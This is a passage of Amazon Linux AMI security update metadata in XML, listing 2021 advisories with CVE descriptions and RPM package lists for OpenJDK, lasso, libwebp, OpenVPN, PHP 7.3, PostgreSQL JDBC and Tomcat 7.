arch="noarch"><filename>Packages/golang-docs-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.15.14" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.14" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.14-1.69.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.15.14" release="1.69.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-bin-1.15.14-1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1528</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1528: important priority package update for java-1.8.0-openjdk</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-2388:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).
1983075: CVE-2021-2388 OpenJDK: Incorrect comparison during range check elimination (Hotspot, 8264066)
CVE-2021-2369:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Library). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).
1982879: CVE-2021-2369 OpenJDK: Incorrect verification of JAR files with multiple MANIFEST.MF files (Library, 8260967)
CVE-2021-2341:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1982874: CVE-2021-2341 OpenJDK: FTP PASV command response can cause FtpClient to connect to arbitrary host (Networking, 8258432)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2341" title="" id="CVE-2021-2341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2369" title="" id="CVE-2021-2369" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2388" title="" id="CVE-2021-2388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.302.b08-0.67.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" 
version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.302.b08-0.67.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1529</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1529: important priority package update for lasso</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28091:
An XML Signature Wrapping (XSW) vulnerability was found in Lasso. This flaw allows an attacker to modify a valid SAML response to include an unsigned SAML assertion, which may be used to impersonate another valid user recognized by the service using Lasso. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability.
1940089: CVE-2021-28091 lasso: XML signature wrapping vulnerability when parsing SAML responses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28091" title="" id="CVE-2021-28091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lasso-devel" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-devel-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso-debuginfo" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-debuginfo-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso-python" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-python-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso-python" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-python-2.5.1-8.6.amzn1.i686.rpm</filename></package><package name="lasso-debuginfo" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-debuginfo-2.5.1-8.6.amzn1.i686.rpm</filename></package><package name="lasso-devel" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-devel-2.5.1-8.6.amzn1.i686.rpm</filename></package><package name="lasso" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-2.5.1-8.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1530</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1530: important priority package update for libwebp</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix 
the following vulnerabilities:
CVE-2020-36328:
A flaw was found in libwebp in versions before 1.0.1. A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1956829: CVE-2020-36328 libwebp: heap-based buffer overflow in WebPDecode*Into functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36328" title="" id="CVE-2020-36328" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwebp-tools" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-tools-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-devel-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-debuginfo-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-java-0.3.0-10.7.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-java-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-debuginfo-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-devel-0.3.0-10.7.amzn1.i686.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-tools-0.3.0-10.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1531</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1531: important priority package update for openvpn</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15078:
99999: OpenVPN 2.5.1 and earlier versions allow remote attackers to bypass authentication and access control channel data on servers configured with deferred authentication, which can be used to potentially trigger further information leaks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15078" title="" id="CVE-2020-15078" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.4.11" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.11-1.48.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.11" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.11-1.48.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.11" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.11-1.48.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.11" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.11-1.48.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.11" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.11-1.48.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.11" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.11-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1532</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1532: medium priority package update for php73</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-21705:
No description is available for this CVE.
1978755: CVE-2021-21705 php: SSRF bypass in FILTER_VALIDATE_URL
CVE-2021-21704:
Several flaws have been found in php. The pdo_firebase module does not check the length of the server version string in a response packet, causing a stack buffer overflow; does not verify the data and uses the wrong type to cast the length, leading to a crash; and does not validate the response before calculation of the exec procedure, leading to a crash. The highest threat from this vulnerability is to system availability.
1978790: CVE-2021-21704 php: security issues in pdo_firebase module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21704" title="" id="CVE-2021-21704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21705" title="" id="CVE-2021-21705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-enchant" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.29" release="1.30.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-recode-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" 
version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.29" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.29-1.30.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.29" release="1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-fpm-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.29" release="1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-dba-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.29" release="1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-soap-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.29-1.30.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.29" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.29-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1533</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1533: important priority package update for postgresql-jdbc</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13692:
A flaw was found in PostgreSQL JDBC in versions prior to 42.2.13: the driver's PgSQLXML implementation was vulnerable to XML External Entity (XXE) processing. The highest threat from this vulnerability is to data confidentiality and system availability.
1852985: CVE-2020-13692 postgresql-jdbc: XML external entity (XXE) vulnerability in PgSQLXML
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13692" title="" id="CVE-2020-13692" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql-jdbc" version="8.4.704" release="4.13.amzn1" epoch="0" arch="noarch"><filename>Packages/postgresql-jdbc-8.4.704-4.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1534</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1534: low priority package update for tomcat7</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:29:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-30640:
A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.
1981544: CVE-2021-30640 tomcat: JNDI realm authentication weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30640" title="" id="CVE-2021-30640" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.109" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.109-1.41.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.109" release="1.41.amzn1" epoch="0" 